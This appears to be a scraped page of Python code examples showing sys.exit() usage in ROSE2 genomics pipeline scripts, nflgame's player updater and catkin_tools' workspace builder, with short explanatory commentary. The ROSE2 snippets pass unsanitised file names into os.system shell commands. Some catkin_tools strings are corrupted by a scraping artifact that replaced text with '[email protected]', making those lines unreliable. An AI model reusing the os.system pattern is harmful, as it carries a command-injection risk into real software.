        print("Mapping control bam %s" % (controlBamFile))
        print(cmd)
        os.system(cmd)

        #check for completion
        if utils.checkOutput(mappedControlFile,0.2,5):
            print("SUCCESSFULLY MAPPED TO %s FROM BAM: %s" % (enhancerGeneGFFFile, controlBamFile))
        else:
            print("ERROR: FAILED TO MAP %s FROM BAM: %s" % (enhancerGeneGFFFile, controlBamFile))
            sys.exit()

    # now get the appropriate output files
    if len(controlBamFile) > 0:
        print("CHECKING FOR MAPPED OUTPUT AT %s AND %s" %
              (mappedRankByFile, mappedControlFile))
        if utils.checkOutput(mappedRankByFile, 1, 1) and utils.checkOutput(mappedControlFile, 1, 1):
            print('MAKING ENHANCER ASSOCIATED GENE TSS SIGNAL DICTIONARIES')
            signalDict = makeSignalDict(mappedRankByFile, mappedControlFile)
        else:
            print("NO MAPPING OUTPUT DETECTED")
            sys.exit()
    else:
        print("CHECKING FOR MAPPED OUTPUT AT %s" % (mappedRankByFile))
        if utils.checkOutput(mappedRankByFile, 1, 30):
            print('MAKING ENHANCER ASSOCIATED GENE TSS SIGNAL DICTIONARIES')
            signalDict = makeSignalDict(mappedRankByFile)
        else:
            print("NO MAPPING OUTPUT DETECTED")
            sys.exit()

    # use enhancer rank to order

    rankOrder = utils.order([min(rankDict[x]) for x in overallGeneList])

    usedNames = []

    # make a new dict to hold TSS signal by max per geneName
    geneNameSigDict = defaultdict(list)
    print('MAKING GENE TABLE')
    for i in rankOrder:
        refID = overallGeneList[i]
        geneName = startDict[refID]['name']
        if usedNames.count(geneName) > 0 and uniqueGenes == True:
            continue
        else:
            usedNames.append(geneName)

        proxEnhancers = geneDict['overlapping'][
            refID] + geneDict['proximal'][refID]

        superStatus = max(superDict[refID])
        enhancerRanks = join([str(x) for x in rankDict[refID]], ',')

        enhancerSignal = signalDict[refID]
        geneNameSigDict[geneName].append(enhancerSignal)

        newLine = [geneName, refID, join(
            proxEnhancers, ','), enhancerRanks, superStatus, enhancerSignal]
        geneToEnhancerTable.append(newLine)
    #utils.unParseTable(geneToEnhancerTable,'/grail/projects/newRose/geneMapper/foo.txt','\t')
    print('MAKING ENHANCER TO TOP GENE TABLE')

    if noFormatTable:
        enhancerToTopGeneTable = [
            enhancerToGeneTable[0] + ['TOP_GENE', 'TSS_SIGNAL']]
    else:
        enhancerToTopGeneTable = [enhancerToGeneTable[0][0:12] + [
            'TOP_GENE', 'TSS_SIGNAL'] + enhancerToGeneTable[0][-2:]]

    for line in enhancerToGeneTable[1:]:

        geneList = []
        if noFormatTable:
            geneList += line[-3].split(',')
            geneList += line[-2].split(',')

        else:
            geneList += line[10].split(',')
            geneList += line[11].split(',')

        geneList = utils.uniquify([x for x in geneList if len(x) > 0])
        if len(geneList) > 0:
            try:
                sigVector = [max(geneNameSigDict[x]) for x in geneList]
                maxIndex = sigVector.index(max(sigVector))
                maxGene = geneList[maxIndex]
                maxSig = sigVector[maxIndex]
                if maxSig == 0.0:
                    maxGene = 'NONE'
                    maxSig = 'NONE'
            except ValueError:
                if len(geneList) == 1:
                    maxGene = geneList[0]
                    maxSig = 'NONE'    
                else:
                    maxGene = 'NONE'
                    maxSig = 'NONE'    
        else:
            maxGene = 'NONE'
            maxSig = 'NONE'
        if noFormatTable:
            newLine = line + [maxGene, maxSig]
        else:
            newLine = line[0:12] + [maxGene, maxSig] + line[-2:]
        enhancerToTopGeneTable.append(newLine)

    # resort enhancerToGeneTable
    if noFormatTable:
        return enhancerToGeneTable, enhancerToTopGeneTable, geneToEnhancerTable
    else:
        enhancerOrder = utils.order([int(line[-2])
                                    for line in enhancerToGeneTable[1:]])
        sortedTable = [enhancerToGeneTable[0]]
        sortedTopGeneTable = [enhancerToTopGeneTable[0]]
        for i in enhancerOrder:
            sortedTable.append(enhancerToGeneTable[(i + 1)])
            sortedTopGeneTable.append(enhancerToTopGeneTable[(i + 1)])

        return sortedTable, sortedTopGeneTable, geneToEnhancerTable
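
The mapping steps in the example above follow a recurring pattern: build a
bamliquidator command line, run it with os.system, poll for the expected
matrix.txt with utils.checkOutput, and bail out with a bare sys.exit() if it
never appears. A minimal, self-contained sketch of that pattern; the polling
loop below only approximates utils.checkOutput (interval and timeout given in
minutes, as in the calls above):

import os
import sys
import time

def wait_for_output(path, interval_minutes, timeout_minutes):
    # Poll until `path` exists and is non-empty, or the timeout expires.
    waited = 0.0
    while waited <= timeout_minutes:
        if os.path.exists(path) and os.path.getsize(path) > 0:
            return True
        time.sleep(interval_minutes * 60)
        waited += interval_minutes
    return False

def run_and_check(cmd, expected_output):
    os.system(cmd)
    if not wait_for_output(expected_output, 0.2, 5):
        print("ERROR: FAILED TO PRODUCE %s" % expected_output)
        sys.exit()    # note: a bare sys.exit() still reports exit status 0
    print("SUCCESSFULLY PRODUCED %s" % expected_output)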

Example 21

Project: pipeline
Source File: ROSE2_META.py
View license
def main():
    '''
    main run call
    '''
    debug = False

    from optparse import OptionParser
    usage = "usage: %prog [options] -g [GENOME] -i [INPUT_REGION_GFF] -r [RANKBY_BAM_FILE] -o [OUTPUT_FOLDER] [OPTIONAL_FLAGS]"
    parser = OptionParser(usage=usage)
    # required flags
    parser.add_option("-i", "--i", dest="input", nargs=1, default=None,
                      help="Enter a comma separated list of .gff or .bed file of binding sites used to make enhancers")
    parser.add_option("-r", "--rankby", dest="rankby", nargs=1, default=None,
                      help="Enter a comma separated list of bams to rank by")
    parser.add_option("-o", "--out", dest="out", nargs=1, default=None,
                      help="Enter an output folder")
    parser.add_option("-g", "--genome", dest="genome", nargs=1, default=None,
                      help="Enter the genome build (MM9,MM8,HG18,HG19)")

    # optional flags
    parser.add_option("-n", "--name", dest="name", nargs=1, default=None,
                      help="Provide a name for the analysis otherwise ROSE will guess")
    parser.add_option("-c", "--control", dest="control", nargs=1, default=None,
                      help="Enter a comma separated list of control bams. Can either provide a single control bam for all rankby bams, or provide a control bam for each individual bam")
    parser.add_option("-s", "--stitch", dest="stitch", nargs=1, default='',
                      help="Enter a max linking distance for stitching. Default will determine optimal stitching parameter")
    parser.add_option("-t", "--tss", dest="tss", nargs=1, default=0,
                      help="Enter a distance from TSS to exclude. 0 = no TSS exclusion")

    parser.add_option("--mask", dest="mask", nargs=1, default=None,
                      help="Mask a set of regions from analysis.  Provide a .bed or .gff of masking regions")

    # RETRIEVING FLAGS
    (options, args) = parser.parse_args()

    if not options.input or not options.rankby or not options.out or not options.genome:
        print('ERROR: missing one or more required arguments')
        parser.print_help()
        exit()

    # making the out folder if it doesn't exist
    outFolder = utils.formatFolder(options.out, True)

    # figuring out folder schema
    gffFolder = utils.formatFolder(outFolder + 'gff/', True)
    mappedFolder = utils.formatFolder(outFolder + 'mappedGFF/', True)

    # GETTING INPUT FILE(s)

    inputList = [inputFile for inputFile in  options.input.split(',') if len(inputFile) > 1]

    #converting all input files into GFFs and moving into the GFF folder
    inputGFFList = []
    for inputFile in inputList:
        if inputFile.split('.')[-1] == 'bed':
            # CONVERTING A BED TO GFF
            inputGFFName = inputFile.split('/')[-1][0:-4] #strips the last 4 characters i.e. '.bed'
            inputGFFFile = '%s%s.gff' % (gffFolder, inputGFFName)
            utils.bedToGFF(inputFile, inputGFFFile)
        elif inputFile.split('.')[-1] == 'gff':
            # COPY THE INPUT GFF TO THE GFF FOLDER

            os.system('cp %s %s' % (inputFile, gffFolder))
            inputGFFFile = '%s%s' % (gffFolder,inputFile.split('/')[-1])

        else:
            print('WARNING: INPUT FILE DOES NOT END IN .gff or .bed. ASSUMING .gff FILE FORMAT')
            # COPY THE INPUT GFF TO THE GFF FOLDER
            os.system('cp %s %s' % (inputFile, gffFolder))
            inputGFFFile = '%s%s' % (gffFolder,inputFile.split('/')[-1])
        inputGFFList.append(inputGFFFile)
                                    

    # GETTING THE LIST OF BAMFILES TO PROCESS
    #either same number of bams for rankby and control 
    #or only 1 control #or none!
    #bamlist should be all rankby bams followed by control bams

    
    bamFileList = []
    if options.control:
        controlBamList = [bam for bam in options.control.split(',') if len(bam) >0]
        rankbyBamList = [bam for bam in options.rankby.split(',') if len(bam) >0]

        if len(controlBamList) == len(rankbyBamList):
            #case where an equal number of backgrounds are given
            bamFileList = rankbyBamList + controlBamList
        elif len(controlBamList) == 1:
            #case where a universal background is applied
            bamFileList = rankbyBamList + controlBamList*len(rankbyBamList)
        else:
            print('ERROR: EITHER PROVIDE A SINGLE CONTROL BAM FOR ALL SAMPLES, OR ONE CONTROL BAM FOR EACH SAMPLE')
            sys.exit()
    else:
        bamFileList = [bam for bam in options.rankby.split(',') if len(bam) > 0]




    # Stitch parameter
    if options.stitch == '':
        stitchWindow = ''
    else:
        stitchWindow = int(options.stitch)

    # tss options
    tssWindow = int(options.tss)
    if tssWindow != 0:
        removeTSS = True
    else:
        removeTSS = False


    # GETTING THE GENOME
    genome = string.upper(options.genome)
    print('USING %s AS THE GENOME' % (genome))

    # GETTING THE CORRECT ANNOT FILE

    genomeDict = {
        'HG18': '%s/annotation/hg18_refseq.ucsc' % (codeFolder),
        'MM9': '%s/annotation/mm9_refseq.ucsc' % (codeFolder),
        'HG19': '%s/annotation/hg19_refseq.ucsc' % (codeFolder),
        'MM8': '%s/annotation/mm8_refseq.ucsc' % (codeFolder),
        'MM10': '%s/annotation/mm10_refseq.ucsc' % (codeFolder),
        'RN4': '%s/annotation/rn4_refseq.ucsc' % (codeFolder),
    }

    try:
        annotFile = genomeDict[genome.upper()]
    except KeyError:
        print('ERROR: UNSUPPORTED GENOME TYPE %s' % (genome))
        sys.exit()


    #FINDING THE ANALYSIS NAME
    if options.name:
        inputName = options.name
    else:
        inputName = inputGFFList[0].split('/')[-1].split('.')[0]
    print('USING %s AS THE ANALYSIS NAME' % (inputName))


    print('FORMATTING INPUT REGIONS')
    # MAKING THE RAW INPUT FILE FROM THE INPUT GFFs
    #use a simpler unique region naming system 
    if len(inputGFFList) == 1:
        inputGFF = utils.parseTable(inputGFFList[0],'\t')
    else:
        inputLoci = []
        for gffFile in inputGFFList:
            print('\tprocessing %s' % (gffFile))
            gff = utils.parseTable(gffFile,'\t')
            gffCollection = utils.gffToLocusCollection(gff,50)
            inputLoci += gffCollection.getLoci()


        inputCollection = utils.LocusCollection(inputLoci,50)
        inputCollection = inputCollection.stitchCollection() # stitches to produce unique regions

        inputGFF = utils.locusCollectionToGFF(inputCollection)

    formattedGFF = []
    #now number things appropriately
    for i,line in enumerate(inputGFF):
        
        #use the coordinates to make a new id inputname_chr_sense_start_stop
        chrom = line[0]
        coords = [int(line[3]) ,int(line[4])]
        sense = line[6]

        lineID = '%s_%s' % (inputName,str(i+1)) #1 indexing
        
        newLine = [chrom,lineID,lineID,min(coords),max(coords),'',sense,'',lineID]
        formattedGFF.append(newLine)
        
    #name of the master input gff file
    masterGFFFile = '%s%s_%s_ALL_-0_+0.gff' % (gffFolder,string.upper(genome),inputName)
    utils.unParseTable(formattedGFF,masterGFFFile,'\t')

    print('USING %s AS THE INPUT GFF' % (masterGFFFile))


    # MAKING THE START DICT
    print('MAKING START DICT')
    startDict = utils.makeStartDict(annotFile)

    #GET CHROMS FOUND IN THE BAMS
    print('GETTING CHROMS IN BAMFILES')
    bamChromList = getBamChromList(bamFileList)
    print("USING THE FOLLOWING CHROMS")
    print(bamChromList)

    #LOADING IN THE GFF AND FILTERING BY CHROM
    print('LOADING AND FILTERING THE GFF')
    inputGFF = filterGFF(masterGFFFile,bamChromList)
    # LOADING IN THE BOUND REGION REFERENCE COLLECTION
    print('LOADING IN GFF REGIONS')
    referenceCollection = utils.gffToLocusCollection(inputGFF)

    print('CHECKING REFERENCE COLLECTION:')
    checkRefCollection(referenceCollection)
        

    # MASKING REFERENCE COLLECTION
    # see if there's a mask
    if options.mask:
        maskFile = options.mask
        # if it's a bed file
        if maskFile.split('.')[-1].upper() == 'BED':
            maskGFF = utils.bedToGFF(maskFile)
        elif maskFile.split('.')[-1].upper() == 'GFF':
            maskGFF = utils.parseTable(maskFile, '\t')
        else:
            print("MASK MUST BE A .gff or .bed FILE")
            sys.exit()
        maskCollection = utils.gffToLocusCollection(maskGFF)

        # now mask the reference loci
        referenceLoci = referenceCollection.getLoci()
        filteredLoci = [locus for locus in referenceLoci if len(maskCollection.getOverlap(locus, 'both')) == 0]
        print("FILTERED OUT %s LOCI THAT WERE MASKED IN %s" % (len(referenceLoci) - len(filteredLoci), maskFile))
        referenceCollection = utils.LocusCollection(filteredLoci, 50)

    # NOW STITCH REGIONS
    print('STITCHING REGIONS TOGETHER')
    stitchedCollection, debugOutput, stitchWindow = regionStitching(referenceCollection, inputName, outFolder, stitchWindow, tssWindow, annotFile, removeTSS)

    # NOW MAKE A STITCHED COLLECTION GFF
    print('MAKING GFF FROM STITCHED COLLECTION')
    stitchedGFF = utils.locusCollectionToGFF(stitchedCollection)

    print(stitchWindow)
    print(type(stitchWindow))
    if not removeTSS:
        stitchedGFFFile = '%s%s_%sKB_STITCHED.gff' % (gffFolder, inputName, str(stitchWindow / 1000))
        stitchedGFFName = '%s_%sKB_STITCHED' % (inputName, str(stitchWindow / 1000))
        debugOutFile = '%s%s_%sKB_STITCHED.debug' % (gffFolder, inputName, str(stitchWindow / 1000))
    else:
        stitchedGFFFile = '%s%s_%sKB_STITCHED_TSS_DISTAL.gff' % (gffFolder, inputName, str(stitchWindow / 1000))
        stitchedGFFName = '%s_%sKB_STITCHED_TSS_DISTAL' % (inputName, str(stitchWindow / 1000))
        debugOutFile = '%s%s_%sKB_STITCHED_TSS_DISTAL.debug' % (gffFolder, inputName, str(stitchWindow / 1000))

    # WRITING DEBUG OUTPUT TO DISK

    if debug:
        print('WRITING DEBUG OUTPUT TO DISK AS %s' % (debugOutFile))
        utils.unParseTable(debugOutput, debugOutFile, '\t')

    # WRITE THE GFF TO DISK
    print('WRITING STITCHED GFF TO DISK AS %s' % (stitchedGFFFile))
    utils.unParseTable(stitchedGFF, stitchedGFFFile, '\t')

    # SETTING UP THE OVERALL OUTPUT FILE
    outputFile1 = outFolder + stitchedGFFName + '_ENHANCER_REGION_MAP.txt'
    print('OUTPUT WILL BE WRITTEN TO  %s' % (outputFile1))



    # MAPPING TO THE NON STITCHED (ORIGINAL GFF)
    # MAPPING TO THE STITCHED GFF

    # Try to use the bamliquidator_path.py script on the cluster; otherwise, fail over to a local copy (in PATH); otherwise fail.



    bamFileListUnique = list(bamFileList)
    bamFileListUnique = utils.uniquify(bamFileListUnique)
    #prevent redundant mapping
    print("MAPPING TO THE FOLLOWING BAMS:")
    print(bamFileListUnique)
    for bamFile in bamFileListUnique:

        bamFileName = bamFile.split('/')[-1]

        # MAPPING TO THE STITCHED GFF
        mappedOut1Folder = '%s%s_%s_MAPPED' % (mappedFolder, stitchedGFFName, bamFileName)
        mappedOut1File = '%s%s_%s_MAPPED/matrix.txt' % (mappedFolder, stitchedGFFName, bamFileName)
        if utils.checkOutput(mappedOut1File, 0.2, 0.2):
            print("FOUND %s MAPPING DATA FOR BAM: %s" % (stitchedGFFFile, mappedOut1File))
        else:
            cmd1 = bamliquidator_path + " --sense . -e 200 --match_bamToGFF -r %s -o %s %s" % (stitchedGFFFile, mappedOut1Folder, bamFile)
            print(cmd1)

            os.system(cmd1)
            if utils.checkOutput(mappedOut1File,0.2,5):
                print("SUCCESSFULLY MAPPED TO %s FROM BAM: %s" % (stitchedGFFFile, bamFileName))
            else:
                print("ERROR: FAILED TO MAP %s FROM BAM: %s" % (stitchedGFFFile, bamFileName))
                sys.exit()

    print('BAM MAPPING COMPLETED NOW MAPPING DATA TO REGIONS')
    # CALCULATE DENSITY BY REGION
    # NEED TO FIX THIS FUNCTION TO ACCOUNT FOR DIFFERENT OUTPUTS OF LIQUIDATOR
    mapCollection(stitchedCollection, referenceCollection, bamFileList, mappedFolder, outputFile1, refName=stitchedGFFName)


    print('FINDING AVERAGE SIGNAL AMONGST BAMS')
    metaOutputFile = collapseRegionMap(outputFile1,inputName + '_MERGED_SIGNAL',controlBams=options.control)

    #now try the merging

    print('CALLING AND PLOTTING SUPER-ENHANCERS')



    rankbyName = inputName + '_MERGED_SIGNAL'
    controlName = 'NONE'
    cmd = 'R --no-save %s %s %s %s < %sROSE2_callSuper.R' % (outFolder, metaOutputFile, inputName, controlName,codeFolder)
    print(cmd)

    os.system(cmd)

    # calling the gene mapper
    time.sleep(20)
    superTableFile = "%s_SuperEnhancers.table.txt" % (inputName)

    #for now don't use ranking bam to call top genes
    cmd = "python %sROSE2_geneMapper.py -g %s -i %s%s &" % (codeFolder,genome, outFolder, superTableFile)
    os.system(cmd)


    stretchTableFile = "%s_StretchEnhancers.table.txt" % (inputName)
 
    cmd = "python %sROSE2_geneMapper.py -g %s -i %s%s &" % (codeFolder,genome, outFolder, stretchTableFile)
    os.system(cmd)


    superStretchTableFile = "%s_SuperStretchEnhancers.table.txt" % (inputName)

    cmd = "python %sROSE2_geneMapper.py -g %s -i %s%s &" % (codeFolder,genome, outFolder, superStretchTableFile)
    os.system(cmd)
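
The ROSE2 code above shells out to bamliquidator with os.system and calls sys.exit() as soon as an expected output file fails to appear, so one failed mapping step aborts the whole pipeline. Below is a minimal, hypothetical sketch of that check-then-exit pattern; the poll_for_file and run_and_check helper names are illustrative and not part of ROSE2.

import os
import sys
import time


def poll_for_file(path, interval=5, timeout=300):
    """Poll until `path` exists or `timeout` seconds elapse."""
    waited = 0
    while waited < timeout:
        if os.path.exists(path):
            return True
        time.sleep(interval)
        waited += interval
    return False


def run_and_check(cmd, expected_output):
    """Run a shell command and abort the pipeline if its output never shows up."""
    print(cmd)
    os.system(cmd)
    if not poll_for_file(expected_output):
        print("ERROR: %s was not produced by: %s" % (expected_output, cmd))
        sys.exit(1)  # a non-zero status tells the caller the pipeline failed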

Example 22

Project: nflgame
Source File: update_players.py
View license
def run():
    parser = argparse.ArgumentParser(
        description='Efficiently download player meta data from NFL.com. Note '
                    'that each invocation of this program guarantees at least '
                    '32 HTTP requests to NFL.com',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    aa = parser.add_argument
    aa('--json-update-file', type=str, default=None,
       help='When set, the file provided will be updated in place with new '
            'meta data from NFL.com. If this option is not set, then the '
            '"players.json" file that comes with nflgame will be updated '
            'instead.')
    aa('--simultaneous-reqs', type=int, default=3,
       help='The number of simultaneous HTTP requests sent to NFL.com at a '
            'time. Set this lower if you are worried about hitting their '
            'servers.')
    aa('--full-scan', action='store_true',
       help='Forces a full scan of nflgame player data since 2009. Typically, '
            'this is only done when starting with a fresh JSON player '
            'database. But it can be useful to re-scan all of the players if '
            'past errors went ignored and data is missing. The advantage of '
            'using this option over starting fresh is that an existing '
            '(gsis_id <-> profile_id) mapping can be used for the majority of '
            'players, instead of querying NFL.com for the mapping all over '
            'again.')
    aa('--no-block', action='store_true',
       help='When set, this program will exit with an error instead of '
            'displaying a prompt to continue. This is useful when calling '
            'this program from another script. The idea here is not to block '
            'indefinitely if something goes wrong and the program wants to '
            'do a fresh update.')
    aa('--phase', default=None, choices=['PRE', 'REG', 'POST'],
       help='Force the update to use the given phase of the season.')
    aa('--year', default=None, type=int,
       help='Force the update to use nflgame players from a specific year.')
    aa('--week', default=None, type=int,
       help='Force the update to use nflgame players from a specific week.')
    args = parser.parse_args()

    if args.json_update_file is None:
        args.json_update_file = nflgame.player._player_json_file
    teams = [team[0] for team in nflgame.teams if team[0] != 'STL']
    pool = multiprocessing.pool.ThreadPool(args.simultaneous_reqs)

    # Before doing anything laborious, make sure we have write access to
    # the JSON database.
    if not os.access(args.json_update_file, os.W_OK):
        eprint('I do not have write access to "%s".' % args.json_update_file)
        eprint('Without write access, I cannot update the player database.')
        sys.exit(1)

    # Fetch the initial mapping of players.
    metas, reverse = initial_mappings(args)
    if len(metas) == 0:
        if args.no_block:
            eprint('I want to do a full update, but I have been told to\n'
                   'exit instead of asking if you want to continue.')
            sys.exit(1)

        eprint("nflgame doesn't know about any players.")
        eprint("Updating player data will require several thousand HTTP HEAD "
               "requests to NFL.com.")
        eprint("It is strongly recommended to find the 'players.json' file "
               "that comes with nflgame.")
        eprint("Are you sure you want to continue? [y/n] ", end='')
        answer = raw_input()
        if answer[0].lower() != 'y':
            eprint("Quitting...")
            sys.exit(1)

    # Accumulate errors as we go. Dump them at the end.
    errors = []

    # Now fetch a set of players that aren't in our mapping already.
    # Restrict the search to the current week if we have a non-empty mapping.
    if len(metas) == 0 or args.full_scan:
        eprint('Loading players in games since 2009, this may take a while...')
        players = {}

        # Grab players one game at a time to avoid obscene memory requirements.
        for _, schedule in nflgame.sched.games.itervalues():
            # If the game is too far in the future, skip it...
            if nflgame.live._game_datetime(schedule) > nflgame.live._now():
                continue
            g = nflgame.game.Game(schedule['eid'])
            for pid, name in players_from_games(metas, [g]):
                players[pid] = name
        eprint('Done.')
    else:
        year, week = nflgame.live.current_year_and_week()
        phase = nflgame.live._cur_season_phase
        if args.phase is not None:
            phase = args.phase
        if args.year is not None:
            year = args.year
        if args.week is not None:
            week = args.week

        eprint('Loading games for %s %d week %d' % (phase, year, week))
        games = nflgame.games(year, week, kind=phase)
        players = dict(players_from_games(metas, games))

    # Find the profile ID for each new player.
    if len(players) > 0:
        eprint('Finding (profile id -> gsis id) mapping for players...')

        def fetch(t):  # t[0] is the gsis_id and t[1] is the gsis name
            return t[0], t[1], profile_url(t[0])
        for i, t in enumerate(pool.imap(fetch, players.items()), 1):
            gid, name, purl = t
            pid = profile_id_from_url(purl)

            progress(i, len(players))
            if purl is None or pid is None:
                errors.append('Could not get profile URL for (%s, %s)'
                              % (gid, name))
                continue

            assert gid not in metas
            metas[gid] = {'gsis_id': gid, 'gsis_name': name,
                          'profile_url': purl, 'profile_id': pid}
            reverse[pid] = gid
        progress_done()

    # Get the soup for each team roster.
    eprint('Downloading team rosters...')
    roster = []

    def fetch(team):
        return team, roster_soup(team)
    for i, (team, soup) in enumerate(pool.imap(fetch, teams), 1):
        progress(i, len(teams))

        if soup is None:
            errors.append('Could not get roster for team %s' % team)
            continue

        tbodys = soup.find(id='result').find_all('tbody')

        for row in tbodys[len(tbodys)-1].find_all('tr'):
            try:
                roster.append(meta_from_soup_row(team, row))
            except Exception:
                errors.append(
                    'Could not get player info from roster row:\n\n%s\n\n'
                    'Exception:\n\n%s\n\n'
                    % (row, traceback.format_exc()))
    progress_done()

    # Find the gsis identifiers for players that are in the roster but haven't
    # recorded a statistic yet. (i.e., Not in nflgame play data.)
    purls = [r['profile_url']
             for r in roster if r['profile_id'] not in reverse]
    if len(purls) > 0:
        eprint('Fetching GSIS identifiers for players not in nflgame...')

        def fetch(purl):
            return purl, gsis_id(purl)
        for i, (purl, gid) in enumerate(pool.imap(fetch, purls), 1):
            progress(i, len(purls))

            if gid is None:
                errors.append('Could not get GSIS id at %s' % purl)
                continue
            reverse[profile_id_from_url(purl)] = gid
        progress_done()

    # Now merge the data from `rosters` into `metas` by using `reverse` to
    # establish the correspondence.
    for data in roster:
        gsisid = reverse.get(data['profile_id'], None)
        if gsisid is None:
            errors.append('Could not find gsis_id for %s' % data)
            continue
        merged = dict(metas.get(gsisid, {}), **data)
        merged['gsis_id'] = gsisid
        metas[gsisid] = merged

    # Finally, try to scrape meta data for players who aren't on a roster
    # but have recorded a statistic in nflgame.
    gids = [(gid, meta['profile_url'])
            for gid, meta in metas.iteritems()
            if 'full_name' not in meta and 'profile_url' in meta]
    if len(gids):
        eprint('Fetching meta data for players not on a roster...')

        def fetch(t):
            gid, purl = t
            resp, content = new_http().request(purl, 'GET')
            if resp['status'] != '200':
                if resp['status'] == '404':
                    return gid, purl, False
                else:
                    return gid, purl, None
            return gid, purl, content
        for i, (gid, purl, html) in enumerate(pool.imap(fetch, gids), 1):
            progress(i, len(gids))
            more_meta = meta_from_profile_html(html)
            if not more_meta:
                # If more_meta is False, then it was a 404. Not our problem.
                if more_meta is None:
                    errors.append('Could not fetch HTML for %s' % purl)
                continue
            metas[gid] = dict(metas[gid], **more_meta)
        progress_done()

    assert len(metas) > 0, "Have no players to add... ???"
    with open(args.json_update_file, 'w+') as fp:
        json.dump(metas, fp, indent=4, sort_keys=True,
                  separators=(',', ': '))

    if len(errors) > 0:
        eprint('\n')
        eprint('There were some errors during the download. Usually this is a')
        eprint('result of an HTTP request timing out, which means the')
        eprint('resulting "players.json" file is probably missing some data.')
        eprint('An appropriate solution is to re-run the script until there')
        eprint('are no more errors (or until the only remaining errors are')
        eprint('problems on the NFL.com side).')
        eprint('-' * 79)
        eprint(('\n' + ('-' * 79) + '\n').join(errors))
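
Example 22 uses sys.exit(1) for two different situations: a hard precondition failure (no write access to the JSON database) and a declined or disallowed interactive prompt when --no-block is set. A minimal sketch of that guard pattern follows; the eprint helper is a hypothetical stand-in for the script's own.

from __future__ import print_function

import sys


def eprint(*args, **kwargs):
    # hypothetical stand-in for the script's eprint: write to stderr
    print(*args, file=sys.stderr, **kwargs)


def confirm_or_exit(question, no_block=False):
    """Ask for confirmation; exit(1) if declined or if prompting is disallowed."""
    if no_block:
        eprint('Confirmation is needed, but --no-block was given; exiting.')
        sys.exit(1)
    eprint(question + ' [y/n] ', end='')
    answer = sys.stdin.readline().strip()
    if not answer or answer[0].lower() != 'y':
        eprint('Quitting...')
        sys.exit(1)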

Example 23

Project: catkin_tools
Source File: build.py
View license
def build_isolated_workspace(
    context,
    packages=None,
    start_with=None,
    no_deps=False,
    unbuilt=False,
    n_jobs=None,
    force_cmake=False,
    pre_clean=False,
    force_color=False,
    quiet=False,
    interleave_output=False,
    no_status=False,
    limit_status_rate=10.0,
    lock_install=False,
    no_notify=False,
    continue_on_failure=False,
    summarize_build=None,
):
    """Builds a catkin workspace in isolation

    This function will find all of the packages in the source space, start some
    executors, feed them packages to build based on dependencies and topological
    ordering, and then monitor the output of the executors, handling logging of
    the builds, the starting, failing, and finishing of package builds, and the
    shutdown of the executors when appropriate.

    :param context: context in which to build the catkin workspace
    :type context: :py:class:`catkin_tools.verbs.catkin_build.context.Context`
    :param packages: list of packages to build, by default their dependencies will also be built
    :type packages: list
    :param start_with: package to start with, skipping all packages which precede it in the topological order
    :type start_with: str
    :param no_deps: If True, the dependencies of packages will not be built first
    :type no_deps: bool
    :param n_jobs: number of parallel package build jobs
    :type n_jobs: int
    :param force_cmake: forces invocation of CMake if True, default is False
    :type force_cmake: bool
    :param force_color: forces colored output even if terminal does not support it
    :type force_color: bool
    :param quiet: suppresses the output of commands unless there is an error
    :type quiet: bool
    :param interleave_output: prints the output of commands as they are received
    :type interleave_output: bool
    :param no_status: disables status bar
    :type no_status: bool
    :param limit_status_rate: rate to which status updates are limited; 0 places no limit.
    :type limit_status_rate: float
    :param lock_install: causes executors to synchronize on access of install commands
    :type lock_install: bool
    :param no_notify: suppresses system notifications
    :type no_notify: bool
    :param continue_on_failure: do not stop building other jobs on error
    :type continue_on_failure: bool
    :param summarize_build: if True, summarizes the build at the end; if None and continue_on_failure is True and
        the build fails, then the build will be summarized; if False, it is never summarized.
    :type summarize_build: bool

    :raises: SystemExit if buildspace is a file or no packages were found in the source space
        or if the provided options are invalid
    """
    pre_start_time = time.time()

    # Assert that the limit_status_rate is valid
    if limit_status_rate < 0:
        sys.exit("[build] @[email protected]{rf}Error:@| The value of --status-rate must be greater than or equal to zero.")

    # Declare a buildspace marker describing the build config for error checking
    buildspace_marker_data = {
        'workspace': context.workspace,
        'profile': context.profile,
        'install': context.install,
        'install_space': context.install_space_abs,
        'devel_space': context.devel_space_abs,
        'source_space': context.source_space_abs}

    # Check build config
    if os.path.exists(os.path.join(context.build_space_abs, BUILDSPACE_MARKER_FILE)):
        with open(os.path.join(context.build_space_abs, BUILDSPACE_MARKER_FILE)) as buildspace_marker_file:
            existing_buildspace_marker_data = yaml.load(buildspace_marker_file)
            misconfig_lines = ''
            for (k, v) in existing_buildspace_marker_data.items():
                new_v = buildspace_marker_data.get(k, None)
                if new_v != v:
                    misconfig_lines += (
                        '\n - %s: %s (stored) is not %s (commanded)' %
                        (k, v, new_v))
            if len(misconfig_lines) > 0:
                sys.exit(clr(
                    "\[email protected]{rf}Error:@| Attempting to build a catkin workspace using build space: "
                    "\"%s\" but that build space's most recent configuration "
                    "differs from the commanded one in ways which will cause "
                    "problems. Fix the following options or use @{yf}`catkin "
                    "clean -b`@| to remove the build space: %s" %
                    (context.build_space_abs, misconfig_lines)))

    # Summarize the context
    summary_notes = []
    if force_cmake:
        summary_notes += [clr("@[email protected]{cf}NOTE:@| Forcing CMake to run for each package.")]
    log(context.summary(summary_notes))

    # Make sure there is a build folder and it is not a file
    if os.path.exists(context.build_space_abs):
        if os.path.isfile(context.build_space_abs):
            sys.exit(clr(
                "[build] @{rf}Error:@| Build space '{0}' exists but is a file and not a folder."
                .format(context.build_space_abs)))
    # If it doesn't exist, create it
    else:
        log("[build] Creating build space: '{0}'".format(context.build_space_abs))
        os.makedirs(context.build_space_abs)

    # Write the current build config for config error checking
    with open(os.path.join(context.build_space_abs, BUILDSPACE_MARKER_FILE), 'w') as buildspace_marker_file:
        buildspace_marker_file.write(yaml.dump(buildspace_marker_data, default_flow_style=False))

    # Get all the packages in the context source space
    # Suppress warnings since this is a utility function
    workspace_packages = find_packages(context.source_space_abs, exclude_subspaces=True, warnings=[])

    # Get packages which have not been built yet
    built_packages, unbuilt_pkgs = get_built_unbuilt_packages(context, workspace_packages)

    # Handle unbuilt packages
    if unbuilt:
        # Check if there are any unbuilt
        if len(unbuilt_pkgs) > 0:
            # Add the unbuilt packages
            packages.extend(list(unbuilt_pkgs))
        else:
            log("[build] No unbuilt packages to be built.")
            return

    # If no_deps is given, ensure packages to build are provided
    if no_deps and packages is None:
        log(clr("[build] @[email protected]{rf}Error:@| With no_deps, you must specify packages to build."))
        return

    # Find list of packages in the workspace
    packages_to_be_built, packages_to_be_built_deps, all_packages = determine_packages_to_be_built(
        packages, context, workspace_packages)

